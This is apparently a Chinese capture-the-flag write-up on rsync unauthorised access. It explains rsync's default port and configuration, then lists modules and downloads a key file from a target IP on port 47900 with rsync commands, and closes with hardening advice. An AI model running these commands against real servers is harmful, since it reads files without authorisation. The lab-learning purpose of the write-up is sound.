0x00
这是第一次接触到这个rsync,刚开始还以为是Redis未授权漏洞,竟然还在kali下使用redis-cli来连接23333
在做这一题需要先了解rsync这是个什么东西
rsync默认端口873
rsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。
rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证。
0x01
其实主要知道几条命令就行了:
rsync IP:: //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip:: //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径
rsync -avz --port=xxx ip::dddd /tmp
虽然知道了指定的端口,但是用一下nmap扫描一下端口情况
image.png
这里先不指定端口扫描,发现果然采用nmap的默认策略扫描不出来,因为这里修改以后的端口是47900,超出了nmap默认扫描的端口范围。
这里又想起Redis的默认端口6379不会被nmap扫描出来,很僵硬....
接下来直接尝试使用rsync连接啦
rsync --port=47900 219.153.49.228::
rsync --port=47900 219.152.49.228::volume
rsync --port=47900 219.153.49.228::volume/key_1913718524583.php /tmp
image.png
完成~
关于rsync的修复主要就是修改默认端口和设置连接的账户和密码。
详细:https://hok1.github.io/2018/02/03/rsync%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE(%E9%99%84dockerfile/
这里还有一个seebug上的比较全的未授权访问漏洞总结
